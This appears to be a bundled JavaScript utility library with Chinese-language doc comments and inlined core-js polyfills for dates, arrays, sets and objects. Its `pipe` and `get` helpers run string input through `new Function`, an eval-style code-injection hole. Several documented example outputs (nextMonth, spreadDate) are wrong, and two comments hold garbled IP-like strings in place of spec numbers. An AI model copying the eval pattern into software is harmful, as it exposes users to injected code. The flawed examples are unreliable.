* @example
* const x = 1;
* const y = 3;
*
* const a = n => n + 1;
* const b = (x, y)=> x * y;
* const c = n => n * n;
*
* pipe(x, `a |> b($, y)`)
* // => 6
*
* pipe(x, `a |> c`)
* // => 4
*/
var pipe = function pipe(param, line) {
return line.split('|>').reduce(function (acc, fn) {
fn = fn.indexOf('(') > -1 ? fn.replace(/[\(|,]\s*\$\s*[\)|,]/g, function (w) {
return w.replace('$', 'acc');
}) : "".concat(fn, "(acc)");
return acc = new Function('acc', 'return ' + fn)(acc);
}, param);
};
/** @module Date */
/**
* 格式化日期。如果value无法被new Date()转换为日期对象,返回空字符串。
* @function dateFormat
* @param {date} [date=new Date()] - 可选,需要格式化的日期,默认是当前时间。
* @param {string} [format='YYYY-MM-DD']- 可选,格式化的格式,默认是`YYYY-MM-DD`格式。
* @return {string}
* @example
* U.dateFormat(new Date(2018, 11, 10))
* // => '2018-12-10'
*
* U.dateFormat(new Date(2018, 11, 10, 10, 29, 36), 'YYYY-MM-DD hh:mm:ss')
* // => '2018-12-10 10:29:36'
*
* U.dateFormat(1545484848484, 'YYYY-MM-DD hh:mm:ss')
* // => '2018-12-22 21:20:48'
*/
var dateFormat = function dateFormat() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var format = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'YYYY-MM-DD';
var d = new Date(date);
var zeroize = function zeroize(val) {
return val < 10 ? "0".concat(val) : "".concat(val);
};
return format.replace(/YYYY|MM|DD|hh|mm|ss/g, function (word) {
return {
'YYYY': d.getFullYear(),
'MM': zeroize(d.getMonth() + 1),
'DD': zeroize(d.getDate()),
'hh': zeroize(d.getHours()),
'mm': zeroize(d.getMinutes()),
'ss': zeroize(d.getSeconds())
}[word] || word;
});
};
/**
* 获取某月的总天数,date可以是任意能被new Date()格式化为日期对象的值。
* @function getMonthDays
* @param {date} [date=new Date()] - 可选,日期,默认是当前时间。
* @return {number}
* @example
* U.getMonthDays(new Date(2018, 1))
* // => 28
*
* U.getMonthDays(153454878787)
* // => 30
*/
var getMonthDays = function getMonthDays() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var d = new Date(date);
d.setMonth(d.getMonth() + 1);
d.setDate(0);
return d.getDate();
};
/**
* 获取星期名称,lang代表输出语言。date为日期,可以是任意能被new Date()格式化为日期对象的值。
* @function getWeekday
* @param {string} [lang='zh'] - 可选,输出语言,默认为'zh',当该值为undefined时取'zh'——表示中文,'en'——表示英文。
* @param {data} [date=new Date()] - 可选,日期,默认为当前日期。
* @return {string}
* @example
* U.getWeekday('zh', new Date(2018, 1, 1))
* // => '星期四'
*
* * U.getWeekday('zh', '2018/2/1')
* // => '星期四'
*
* U.getWeekday('en', 153454878787)
* // => 'Tuesday'
*/
var getWeekday = function getWeekday() {
var lang = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'zh';
var date = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : new Date();
var day = new Date(date).getDay();
return lang === 'en' ? ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'][day] : '星期' + '日一二三四五六'.charAt(day);
};
/**
* 获取上一个月份
* @function prevMonth
* @param {*} [date=new Date()]- 可选,日期,默认是当前时间。
* @return {date}
* @example
* U.prevMonth()
* // => 2018-11-20T17:07:37.937Z (当前时间为2018-12)
*
* U.prevMonth(new Date(2018, 10, 9))
* // => 2018-10-08T16:00:00.000Z
*
* U.prevMonth(153454878787)
* // => 1974-10-12T02:21:18.787Z
*
* U.prevMonth('2018/12/3')
* // => 2018-11-02T16:00:00.000Z
*/
var prevMonth = function prevMonth() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var d = new Date(date);
d.setMonth(d.getMonth() - 1);
return d;
};
/**
* 获取下一个月份
* @function nextMonth
* @param {date} [date=new Date()] - 可选,日期,默认是当前时间。
* @return {date}
* @example
* U.nextMonth()
* // => 2019-01-20T17:13:15.179Z (当前时间为2018-12)
*
* U.nextMonth(new Date(2018, 10, 9))
* // => 2018-10-08T16:00:00.000Z
*
* U.nextMonth(153454878787)
* // => 1974-12-12T02:21:18.787Z
*
* U.nextMonth('2018/12/3')
* // => 2018-11-02T16:00:00.000Z
*/
var nextMonth = function nextMonth() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var d = new Date(date);
d.setMonth(d.getMonth() + 1);
return d;
};
/**
* 比较日期dateA是否是dateB之后的日期,返回布尔值
* @function isAfterDate
* @param {date} dateA - 较后的日期。
* @param {date} dateB - 较前的日期。
* @return {boolean}
* @example
* U.isAfterDate('2018/11/1', '2018/11/30')
* // => false
*
* U.isAfterDate(new Date(2018, 12, 11), new Date(2018, 12, 10))
* // => true
*/
var isAfterDate = function isAfterDate(dateA, dateB) {
return new Date(dateA) > new Date(dateB);
};
/**
* 返回距离date为n天的日期
* @function spreadDate
* @param {number} n - 天数。当n为负数,返回过去的日期;当n为正数,返回未来的日期。
* @param {date} [date=new Date()] - 可选,日期,默认为当前日期。
* @return {date}
* @example
* U.spreadDate(1)
* // => Thu Feb 21 2019 21:01:53 GMT+0800 (当前时间:Wed Feb 20 2019 21:01:53 GMT+0800 )
*
* U.spreadDate(1)
* // => Thu Feb 19 2019 21:01:53 GMT+0800 (当前时间:Wed Feb 20 2019 21:01:53 GMT+0800 )
*
* U.spreadDate(7, new Date(2018, 9, 10))
* // => Wed Oct 17 2018 00:00:00 GMT+0800 (中国标准时间)
*/
var spreadDate = function spreadDate(n) {
var date = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : new Date();
return new Date(+date + n * 24 * 60 * 60 * 1000);
};
var _iterCall = function (iterator, fn, value, entries) {
try {
return entries ? fn(_anObject(value)[0], value[1]) : fn(value); // 7.4.6 IteratorClose(iterator, completion)
} catch (e) {
var ret = iterator['return'];
if (ret !== undefined) _anObject(ret.call(iterator));
throw e;
}
};
var ITERATOR$1 = _wks('iterator');
var ArrayProto = Array.prototype;
var _isArrayIter = function (it) {
return it !== undefined && (_iterators.Array === it || ArrayProto[ITERATOR$1] === it);
};
var TAG$1 = _wks('toStringTag'); // ES3 wrong here
var ARG = _cof(function () {
return arguments;
}()) == 'Arguments'; // fallback for IE11 Script Access Denied error
var tryGet = function (it, key) {
try {
return it[key];
} catch (e) {
/* empty */
}
};
var _classof = function (it) {
var O, T, B;
return it === undefined ? 'Undefined' : it === null ? 'Null' // @@toStringTag case
: typeof (T = tryGet(O = Object(it), TAG$1)) == 'string' ? T // builtinTag case
: ARG ? _cof(O) // ES3 arguments fallback
: (B = _cof(O)) == 'Object' && typeof O.callee == 'function' ? 'Arguments' : B;
};
var ITERATOR$2 = _wks('iterator');
var core_getIteratorMethod = _core.getIteratorMethod = function (it) {
if (it != undefined) return it[ITERATOR$2] || it['@@iterator'] || _iterators[_classof(it)];
};
var ITERATOR$3 = _wks('iterator');
var SAFE_CLOSING = false;
try {
var riter = [7][ITERATOR$3]();
riter['return'] = function () {
SAFE_CLOSING = true;
}; // eslint-disable-next-line no-throw-literal
} catch (e) {
/* empty */
}
var _iterDetect = function (exec, skipClosing) {
if (!skipClosing && !SAFE_CLOSING) return false;
var safe = false;
try {
var arr = [7];
var iter = arr[ITERATOR$3]();
iter.next = function () {
return {
done: safe = true
};
};
arr[ITERATOR$3] = function () {
return iter;
};
exec(arr);
} catch (e) {
/* empty */
}
return safe;
};
_export(_export.S + _export.F * !_iterDetect(function (iter) {
}), 'Array', {
// 22.1.2.1 Array.from(arrayLike, mapfn = undefined, thisArg = undefined)
from: function from(arrayLike
/* , mapfn = undefined, thisArg = undefined */
) {
var O = _toObject(arrayLike);
var C = typeof this == 'function' ? this : Array;
var aLen = arguments.length;
var mapfn = aLen > 1 ? arguments[1] : undefined;
var mapping = mapfn !== undefined;
var index = 0;
var iterFn = core_getIteratorMethod(O);
var length, result, step, iterator;
if (mapping) mapfn = _ctx(mapfn, aLen > 2 ? arguments[2] : undefined, 2); // if object isn't iterable or it's array with default iterator - use simple case
if (iterFn != undefined && !(C == Array && _isArrayIter(iterFn))) {
for (iterator = iterFn.call(O), result = new C(); !(step = iterator.next()).done; index++) {
_createProperty(result, index, mapping ? _iterCall(iterator, mapfn, [step.value, index], true) : step.value);
}
} else {
length = _toLength(O.length);
for (result = new C(length); length > index; index++) {
_createProperty(result, index, mapping ? mapfn(O[index], index) : O[index]);
}
}
result.length = index;
return result;
}
});
var from_1 = _core.Array.from;
var from_1$1 = from_1;
var _redefineAll = function (target, src, safe) {
for (var key in src) {
if (safe && target[key]) target[key] = src[key];else _hide(target, key, src[key]);
}
return target;
};
var _anInstance = function (it, Constructor, name, forbiddenField) {
if (!(it instanceof Constructor) || forbiddenField !== undefined && forbiddenField in it) {
throw TypeError(name + ': incorrect invocation!');
}
return it;
};
var _forOf = createCommonjsModule(function (module) {
var BREAK = {};
var RETURN = {};
var exports = module.exports = function (iterable, entries, fn, that, ITERATOR) {
var iterFn = ITERATOR ? function () {
return iterable;
} : core_getIteratorMethod(iterable);
var f = _ctx(fn, that, entries ? 2 : 1);
var index = 0;
var length, step, iterator, result;
if (typeof iterFn != 'function') throw TypeError(iterable + ' is not iterable!'); // fast case for arrays with default iterator
if (_isArrayIter(iterFn)) for (length = _toLength(iterable.length); length > index; index++) {
result = entries ? f(_anObject(step = iterable[index])[0], step[1]) : f(iterable[index]);
if (result === BREAK || result === RETURN) return result;
} else for (iterator = iterFn.call(iterable); !(step = iterator.next()).done;) {
result = _iterCall(iterator, f, step.value, entries);
if (result === BREAK || result === RETURN) return result;
}
};
exports.BREAK = BREAK;
exports.RETURN = RETURN;
});
var SPECIES = _wks('species');
var _setSpecies = function (KEY) {
var C = typeof _core[KEY] == 'function' ? _core[KEY] : _global[KEY];
if (_descriptors && C && !C[SPECIES]) _objectDp.f(C, SPECIES, {
configurable: true,
get: function () {
return this;
}
});
};
var _validateCollection = function (it, TYPE) {
if (!_isObject(it) || it._t !== TYPE) throw TypeError('Incompatible receiver, ' + TYPE + ' required!');
return it;
};
var dP$2 = _objectDp.f;
var fastKey = _meta.fastKey;
var SIZE = _descriptors ? '_s' : 'size';
var getEntry = function (that, key) {
// fast case
var index = fastKey(key);
var entry;
if (index !== 'F') return that._i[index]; // frozen object case
for (entry = that._f; entry; entry = entry.n) {
if (entry.k == key) return entry;
}
};
var _collectionStrong = {
getConstructor: function (wrapper, NAME, IS_MAP, ADDER) {
var C = wrapper(function (that, iterable) {
_anInstance(that, C, NAME, '_i');
that._t = NAME; // collection type
that._i = _objectCreate(null); // index
that._f = undefined; // first entry
that._l = undefined; // last entry
that[SIZE] = 0; // size
if (iterable != undefined) _forOf(iterable, IS_MAP, that[ADDER], that);
});
_redefineAll(C.prototype, {
// 23.1.3.1 Map.prototype.clear()
// 23.2.3.2 Set.prototype.clear()
clear: function clear() {
for (var that = _validateCollection(this, NAME), data = that._i, entry = that._f; entry; entry = entry.n) {
entry.r = true;
if (entry.p) entry.p = entry.p.n = undefined;
delete data[entry.i];
}
that._f = that._l = undefined;
that[SIZE] = 0;
},
// 23.1.3.3 Map.prototype.delete(key)
// 23.2.3.4 Set.prototype.delete(value)
'delete': function (key) {
var that = _validateCollection(this, NAME);
var entry = getEntry(that, key);
if (entry) {
var next = entry.n;
var prev = entry.p;
delete that._i[entry.i];
entry.r = true;
if (prev) prev.n = next;
if (next) next.p = prev;
if (that._f == entry) that._f = next;
if (that._l == entry) that._l = prev;
that[SIZE]--;
}
return !!entry;
},
// 23.2.3.6 Set.prototype.forEach(callbackfn, thisArg = undefined)
// 23.1.3.5 Map.prototype.forEach(callbackfn, thisArg = undefined)
forEach: function forEach(callbackfn
/* , that = undefined */
) {
_validateCollection(this, NAME);
var f = _ctx(callbackfn, arguments.length > 1 ? arguments[1] : undefined, 3);
var entry;
while (entry = entry ? entry.n : this._f) {
f(entry.v, entry.k, this); // revert to the last existing entry
while (entry && entry.r) entry = entry.p;
}
},
// 23.1.3.7 Map.prototype.has(key)
// 23.2.3.7 Set.prototype.has(value)
has: function has(key) {
return !!getEntry(_validateCollection(this, NAME), key);
}
});
if (_descriptors) dP$2(C.prototype, 'size', {
get: function () {
return _validateCollection(this, NAME)[SIZE];
}
});
return C;
},
def: function (that, key, value) {
var entry = getEntry(that, key);
var prev, index; // change existing entry
if (entry) {
entry.v = value; // create new entry
} else {
that._l = entry = {
i: index = fastKey(key, true),
// <- index
k: key,
// <- key
v: value,
// <- value
p: prev = that._l,
// <- previous entry
n: undefined,
// <- next entry
r: false // <- removed
};
if (!that._f) that._f = entry;
if (prev) prev.n = entry;
that[SIZE]++; // add to index
if (index !== 'F') that._i[index] = entry;
}
return that;
},
getEntry: getEntry,
setStrong: function (C, NAME, IS_MAP) {
// add .keys, .values, .entries, [@@iterator]
// 192.168.3.11, 172.16.31.10, 172.16.31.10, 172.16.17.32, 192.168.127.12, 192.168.127.12, 172.16.58.3, 172.16.58.3
_iterDefine(C, NAME, function (iterated, kind) {
this._t = _validateCollection(iterated, NAME); // target
this._k = kind; // kind
this._l = undefined; // previous
}, function () {
var that = this;
var kind = that._k;
var entry = that._l; // revert to the last existing entry
while (entry && entry.r) entry = entry.p; // get next entry
if (!that._t || !(that._l = entry = entry ? entry.n : that._t._f)) {
// or finish the iteration
that._t = undefined;
return _iterStep(1);
} // return step by kind
if (kind == 'keys') return _iterStep(0, entry.k);
if (kind == 'values') return _iterStep(0, entry.v);
return _iterStep(0, [entry.k, entry.v]);
}, IS_MAP ? 'entries' : 'values', !IS_MAP, true); // add [@@species], 172.16.17.32, 192.168.127.12
_setSpecies(NAME);
}
};
var SPECIES$1 = _wks('species');
var _arraySpeciesConstructor = function (original) {
var C;
if (_isArray(original)) {
C = original.constructor; // cross-realm fallback
if (typeof C == 'function' && (C === Array || _isArray(C.prototype))) C = undefined;
if (_isObject(C)) {
C = C[SPECIES$1];
if (C === null) C = undefined;
}
}
return C === undefined ? Array : C;
};
var _arraySpeciesCreate = function (original, length) {
return new (_arraySpeciesConstructor(original))(length);
};
// 1 -> Array#map
// 2 -> Array#filter
// 3 -> Array#some
// 4 -> Array#every
// 5 -> Array#find
// 6 -> Array#findIndex
var _arrayMethods = function (TYPE, $create) {
var IS_MAP = TYPE == 1;
var IS_FILTER = TYPE == 2;
var IS_SOME = TYPE == 3;
var IS_EVERY = TYPE == 4;
var IS_FIND_INDEX = TYPE == 6;
var NO_HOLES = TYPE == 5 || IS_FIND_INDEX;
var create = $create || _arraySpeciesCreate;
return function ($this, callbackfn, that) {
var O = _toObject($this);
var self = _iobject(O);
var f = _ctx(callbackfn, that, 3);
var length = _toLength(self.length);
var index = 0;
var result = IS_MAP ? create($this, length) : IS_FILTER ? create($this, 0) : undefined;
var val, res;
for (; length > index; index++) if (NO_HOLES || index in self) {
val = self[index];
res = f(val, index, O);
if (TYPE) {
if (IS_MAP) result[index] = res; // map
else if (res) switch (TYPE) {
case 3:
return true;
// some
case 5:
return val;
// find
case 6:
return index;
// findIndex
case 2:
result.push(val);
// filter
} else if (IS_EVERY) return false; // every
}
}
return IS_FIND_INDEX ? -1 : IS_SOME || IS_EVERY ? IS_EVERY : result;
};
};
var dP$3 = _objectDp.f;
var each = _arrayMethods(0);
var _collection = function (NAME, wrapper, methods, common, IS_MAP, IS_WEAK) {
var Base = _global[NAME];
var C = Base;
var ADDER = IS_MAP ? 'set' : 'add';
var proto = C && C.prototype;
var O = {};
if (!_descriptors || typeof C != 'function' || !(IS_WEAK || proto.forEach && !_fails(function () {
new C().entries().next();
}))) {
// create collection constructor
C = common.getConstructor(wrapper, NAME, IS_MAP, ADDER);
_redefineAll(C.prototype, methods);
_meta.NEED = true;
} else {
C = wrapper(function (target, iterable) {
_anInstance(target, C, NAME, '_c');
target._c = new Base();
if (iterable != undefined) _forOf(iterable, IS_MAP, target[ADDER], target);
});
each('add,clear,delete,forEach,get,has,set,keys,values,entries,toJSON'.split(','), function (KEY) {
var IS_ADDER = KEY == 'add' || KEY == 'set';
if (KEY in proto && !(IS_WEAK && KEY == 'clear')) _hide(C.prototype, KEY, function (a, b) {
_anInstance(this, C, KEY);
if (!IS_ADDER && IS_WEAK && !_isObject(a)) return KEY == 'get' ? undefined : false;
var result = this._c[KEY](a === 0 ? 0 : a, b);
return IS_ADDER ? this : result;
});
});
IS_WEAK || dP$3(C.prototype, 'size', {
get: function () {
return this._c.size;
}
});
}
_setToStringTag(C, NAME);
O[NAME] = C;
_export(_export.G + _export.W + _export.F, O);
if (!IS_WEAK) common.setStrong(C, NAME, IS_MAP);
return C;
};
var SET = 'Set'; // 23.2 Set Objects
var es6_set = _collection(SET, function (get) {
return function Set() {
return get(this, arguments.length > 0 ? arguments[0] : undefined);
};
}, {
// 23.2.3.1 Set.prototype.add(value)
add: function add(value) {
return _collectionStrong.def(_validateCollection(this, SET), value = value === 0 ? 0 : value, value);
}
}, _collectionStrong);
var _arrayFromIterable = function (iter, ITERATOR) {
var result = [];
_forOf(iter, false, result.push, result, ITERATOR);
return result;
};
var _collectionToJson = function (NAME) {
return function toJSON() {
if (_classof(this) != NAME) throw TypeError(NAME + "#toJSON isn't generic");
return _arrayFromIterable(this);
};
};
_export(_export.P + _export.R, 'Set', {
toJSON: _collectionToJson('Set')
});
var _setCollectionOf = function (COLLECTION) {
_export(_export.S, COLLECTION, {
of: function of() {
var length = arguments.length;
var A = new Array(length);
while (length--) A[length] = arguments[length];
return new this(A);
}
});
};
_setCollectionOf('Set');
var _setCollectionFrom = function (COLLECTION) {
_export(_export.S, COLLECTION, {
from: function from(source
/* , mapFn, thisArg */
) {
var mapFn = arguments[1];
var mapping, A, n, cb;
_aFunction(this);
mapping = mapFn !== undefined;
if (mapping) _aFunction(mapFn);
if (source == undefined) return new this();
A = [];
if (mapping) {
n = 0;
cb = _ctx(mapFn, arguments[2], 2);
_forOf(source, false, function (nextItem) {
A.push(cb(nextItem, n++));
});
} else {
_forOf(source, false, A.push, A);
}
return new this(A);
}
});
};
_setCollectionFrom('Set');
var set = _core.Set;
var set$1 = set;
function _arrayWithoutHoles(arr) {
if (isArray$1(arr)) {
for (var i = 0, arr2 = new Array(arr.length); i < arr.length; i++) {
arr2[i] = arr[i];
}
return arr2;
}
}
var arrayWithoutHoles = _arrayWithoutHoles;
var ITERATOR$4 = _wks('iterator');
var core_isIterable = _core.isIterable = function (it) {
var O = Object(it);
return O[ITERATOR$4] !== undefined || '@@iterator' in O // eslint-disable-next-line no-prototype-builtins
|| _iterators.hasOwnProperty(_classof(O));
};
var isIterable = core_isIterable;
var isIterable$1 = isIterable;
function _iterableToArray(iter) {
if (isIterable$1(Object(iter)) || Object.prototype.toString.call(iter) === "[object Arguments]") return from_1$1(iter);
}
var iterableToArray = _iterableToArray;
function _nonIterableSpread() {
throw new TypeError("Invalid attempt to spread non-iterable instance");
}
var nonIterableSpread = _nonIterableSpread;
function _toConsumableArray(arr) {
return arrayWithoutHoles(arr) || iterableToArray(arr) || nonIterableSpread();
}
var toConsumableArray = _toConsumableArray;
/**
* 获取数组的最后一个值
* @function lastItem
* @param {array} arr - 源数组
* @return {*}
* @example
* let value = U.lastItem([1, 1, 2, 3])
* // => 3
*
* let value = U.lastItem([])
* // => undefined
*/
var lastItem = function lastItem(arr) {
return arr[arr.length - 1];
};
/**
* 数组去重,返回无重复值的新数组。
* @function uniqueItems
* @param {array} arr - 需要去重的源数组
* @return {array}
* @example
* let arr = [1, 1, 2, 3, 3, 4, 5]
* arr = U.uniqueItems(arr)
* // => [1, 2, 3, 4, 5]
*/
var uniqueItems = function uniqueItems(arr) {
return toConsumableArray(new set$1(arr));
};
/**
* 根据提供的比较器函数返回数组的所有唯一值。
* @function uniqueItemsBy
* @param {array} arr - 数组
* @param {function} fn - 比较器函数
* @param {*} fn.a - 比较元素
* @param {*} fn.b - 比较元素
* @param {boolean} [isRight=false] - 可选,默认false,是否从数组最后一个元素开始比较
* @return {array}
* @example
* U.uniqueItemsBy([
* { id: 0, value: 'a' },
* { id: 1, value: 'b' },
* { id: 2, value: 'c' },
* { id: 0, value: 'd' }
* ],
* (a, b) => a.id == b.id)
* // => [{ id: 0, value: 'a' }, { id: 1, value: 'b' }, { id: 2, value: 'c' }]
*
* U.uniqueItemsBy([
* { id: 0, value: 'a' },
* { id: 1, value: 'b' },
* { id: 2, value: 'c' },
* { id: 0, value: 'd' }
* ],
* (a, b) => a.id == b.id,
* true)
* // => [{ id: 0, value: 'd' }, { id: 2, value: 'c' }, { id: 1, value: 'b' }]
*/
var uniqueItemsBy = function uniqueItemsBy(arr, fn, isRight) {
return arr[isRight ? 'reduceRight' : 'reduce'](function (acc, x) {
if (!acc.some(function (y) {
return fn(x, y);
})) acc.push(x);
return acc;
}, []);
};
/**
* 检索数组重复元素,返回新数组。
* @function repeatItems
* @param {array} arr - 数组
* @return {array}
* @example
* U.repeatItems([1, 1, 2, 3, 3, 4, 5])
* // => [1, 3]
*/
var repeatItems = function repeatItems(arr) {
return arr.filter(function (item, i) {
return arr.indexOf(item) === i && arr.indexOf(item) !== arr.lastIndexOf(item);
});
};
/**
* 初始化一个给定长度以及值的数组。当映射是一个函数时提供迭代的i和数组长度len两个参数。
* @function initArray
* @param {number} len - 数组长度
* @param {*|function} [val|fn=null] - 可选,数组元素的映射值,默认为null;当映射是一个函数时,该函数参数如下表:
* @param {number} fn.index - 可选,数组中正在处理的当前元素的索引
* @param {number} fn.length - 可选,数组的长度
* @return {array}
* @example
* console.log(U.initArray(3))
* // => [null, null, null]
*
* const arr = U.initArray(3, {a: 1, b: 2})
* // => [ { a: 1, b: 2 }, { a: 1, b: 2 }, { a: 1, b: 2 } ]
*
* const arr = U.initArray(3, (i) => i * 2)
* // => [ 0, 2, 4 ]
*/
var initArray = function initArray(len) {
var val = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : null;
return isFunction(val) ? from_1$1({
length: len
}, function (item, i) {
return val(i, len);
}) : from_1$1({
length: len
}).fill(val);
};
/**
* 使用函数将数组的值映射到对象,其中键 - 值对由数组原始值作为键和映射值组成。
* @function mapObject
* @param {array} arr - 对象键名的数组
* @param {function(currentValue, index, array)} fn - 生成对象值的映射函数
* @param {*} fn.currentValue - 数组中正在处理的当前元素
* @param {number} fn.index - 可选,数组中正在处理的当前元素的索引
* @param {array} fn.array - 可选,当前正在处理的数组
* @return {object}
* @example
* const obj = U.mapObject([1, 2, 3], i => i * 2)
* // => {1: 2, 2: 4, 3: 6}
*/
var mapObject = function mapObject(arr, fn) {
arr = [arr, arr.map(fn)];
return arr[0].reduce(function (acc, val, i) {
acc[val] = arr[1][i];
return acc;
}, {});
};
/**
* 求数组内元素特定键或键映射的平均值
* @function averageBy
* @param {array} arr - 求值数组
* @param {function|string} fn - 键值运算映射函数或键名
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.averageBy(arr, 'a')
* // => 1.5
*
* U.averageBy(arr, o => o.a * o.b)
* // => 5
*/
var averageBy = function averageBy(arr, fn) {
return arr.map(isFunction(fn) ? fn : function (val) {
return val[fn];
}).reduce(function (acc, v) {
return acc + v;
}, 0) / arr.length;
};
/**
* 求数组内元素特定键或键映射的最大值
* @function maxBy
* @param {array} arr - 求值数组
* @param {function|string} fn - 键值运算映射函数或键名
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.max(arr, 'a')
* // => 2
*
* U.maxBy(arr, o => o.a * o.b)
* // => 8
*/
var maxBy = function maxBy(arr, fn) {
return Math.max.apply(Math, toConsumableArray(arr.map(isFunction(fn) ? fn : function (v) {
return v[fn];
})));
};
/**
* 求数组内元素特定键或键映射的最小值
* @function minBy
* @param {array} arr - 求值数组
* @param {function|string} fn - 键值运算映射函数或键名
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.minBy(arr, 'a')
* // => 1
*
* U.minBy(arr, o => o.a * o.b)
* // => 2
*/
var minBy = function minBy(arr, fn) {
return Math.min.apply(Math, toConsumableArray(arr.map(isFunction(fn) ? fn : function (v) {
return v[fn];
})));
};
/**
* 将数组切割分组函数
* @function chunk
* @param {array} arr - 切割的数组
* @param {number} size - 切割数组的长度
* @return {array}
* @example
* chunk([1, 2, 3, 4, 5], 2)
* => [[1,2],[3,4],[5]]
*/
var chunk = function chunk(arr, size) {
return from_1$1({
length: Math.ceil(arr.length / size)
}, function (v, i) {
return arr.slice(i * size, i * size + size);
});
};
var meta = _meta.onFreeze;
_objectSap('freeze', function ($freeze) {
return function freeze(it) {
return $freeze && _isObject(it) ? $freeze(meta(it)) : it;
};
});
var freeze = _core.Object.freeze;
var freeze$1 = freeze;
var $assign = Object.assign; // should work with symbols and should have deterministic property order (V8 bug)
var _objectAssign = !$assign || _fails(function () {
var A = {};
var B = {}; // eslint-disable-next-line no-undef
var S = Symbol();
var K = 'abcdefghijklmnopqrst';
A[S] = 7;
K.split('').forEach(function (k) {
B[k] = k;
});
return $assign({}, A)[S] != 7 || Object.keys($assign({}, B)).join('') != K;
}) ? function assign(target, source) {
// eslint-disable-line no-unused-vars
var T = _toObject(target);
var aLen = arguments.length;
var index = 1;
var getSymbols = _objectGops.f;
var isEnum = _objectPie.f;
while (aLen > index) {
var S = _iobject(arguments[index++]);
var keys = getSymbols ? _objectKeys(S).concat(getSymbols(S)) : _objectKeys(S);
var length = keys.length;
var j = 0;
var key;
while (length > j) {
key = keys[j++];
if (!_descriptors || isEnum.call(S, key)) T[key] = S[key];
}
}
return T;
} : $assign;
_export(_export.S + _export.F, 'Object', {
assign: _objectAssign
});
var assign = _core.Object.assign;
var assign$1 = assign;
function ownKeys(object, enumerableOnly) { var keys = keys$1(object); if (getOwnPropertySymbols$1) { keys.push.apply(keys, getOwnPropertySymbols$1(object)); } if (enumerableOnly) keys = keys.filter(function (sym) { return getOwnPropertyDescriptor$1(object, sym).enumerable; }); return keys; }
function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(source, true).forEach(function (key) { defineProperty$3(target, key, source[key]); }); } else if (getOwnPropertyDescriptors$1) { defineProperties$1(target, getOwnPropertyDescriptors$1(source)); } else { ownKeys(source).forEach(function (key) { defineProperty$1(target, key, getOwnPropertyDescriptor$1(source, key)); }); } } return target; }
/**
* 对象深复制函数
* @function deepClone
* @param {object} obj - 深复制的源对象
* @return {object}
* @example
* var a = { foo: 'bar', obj: { a: 1, b: 2 } }
* var b = U.deepClone(a)
* b.foo = 'foo'
* // => a = { foo: 'bar', obj: { a: 1, b: 2 } }, b = { foo: 'foo', obj: { a: 1, b: 2 } }
*/
var deepClone = function deepClone(obj) {
var clone = assign$1({}, obj);
keys$1(clone).forEach(function (k) {
clone[k] = isObject(obj[k]) ? deepClone(obj[k]) : obj[k];
});
return isArray$1(obj) ? (clone.length = obj.length) && from_1$1(clone) : clone;
};
/**
* 对象深冻结函数
* @function deepFreeze
* @param {object} obj - 深冻结的源对象
* @return {object}
* @example
* let arr = [1, [2, 3]]
* const o = U.deepFreeze(arr)
* o[0] = 3
* o[1][0] = 4
* // => arr = [1, [2, 3]], o = [1, [2, 3]]
*/
var deepFreeze = function deepFreeze(obj) {
keys$1(obj).forEach(function (prop) {
if (obj[prop] instanceof Object && obj[prop] !== null) {
deepFreeze(obj[prop]);
}
});
return freeze$1(obj);
};
/**
* 重命名对象的key名称。
* @function renameKeys
* @param {object} map - 由oldKey:newKey键值对组成的对象
* @param {object} obj - 目标对象
* @return {object}
* @example
* let obj = {name: 'john', job: 'fonts', detail: [1, 2]}
* U.renameKeys({job: 'possion'}, obj)
* // => { name: 'john', possion: 'fonts', detail: [ 1, 2 ] }
*/
var renameKeys = function renameKeys(map, obj) {
return keys$1(obj).reduce(function (acc, key) {
return _objectSpread({}, acc, {}, defineProperty$3({}, map[key] || key, obj[key]));
}, {});
};
/**
* 从对象中省略与给定键对应的键值对。
* @function omit
* @param {object} obj - 目标对象
* @param {array} arr - 省略的键名数组
* @return {object}
* @example
* U.omit({ a: 1, b: '2', c: 3 }, ['b'])
* // => { a: 1, c: 3 }
*/
var omit = function omit(obj, arr) {
return keys$1(obj).filter(function (k) {
return !arr.includes(k);
}).reduce(function (acc, key) {
return acc[key] = obj[key], acc;
}, {});
};
/**
* 判断val是否是空对象。
* @function isEmpty
* @param {*} val - 检查的对象
* @return {boolean}
* @example
* U.isEmpty(new Map()) // => true
* U.isEmpty(new Set()) // => true
* U.isEmpty({}) // => true
* U.isEmpty([]) // => true
* U.isEmpty('') // => true
* U.isEmpty({a: 1}) // => false
* U.isEmpty([2]) // => false
* U.isEmpty('text') // => false
* U.isEmpty(123) // => true
* U.isEmpty(true) // => true
* U.isEmpty(false) // => true
*/
var isEmpty = function isEmpty(val) {
return !(keys$1(val) || val).length;
};
/**
* 根据obj对象的path路径获取值。
* @function get
* @param {object} obj - 要检索的对象
* @param {string} path - 要获取属性的路径
* @return {*}
* @example
* const obj = {name: 'joe', child: [{name: 'john', child: null}]}
* U.get(obj, 'child[0].name')
* // => 'john'
*/
var get = function get(obj, path) {
return new Function('obj', 'return obj.' + path)(obj);
};
// fast apply, http://jsperf.lnkit.com/fast-apply/5
var _invoke = function (fn, args, that) {
var un = that === undefined;
switch (args.length) {
case 0:
return un ? fn() : fn.call(that);
case 1:
return un ? fn(args[0]) : fn.call(that, args[0]);
case 2:
return un ? fn(args[0], args[1]) : fn.call(that, args[0], args[1]);
case 3:
return un ? fn(args[0], args[1], args[2]) : fn.call(that, args[0], args[1], args[2]);
case 4:
return un ? fn(args[0], args[1], args[2], args[3]) : fn.call(that, args[0], args[1], args[2], args[3]);
}
return fn.apply(that, args);
};
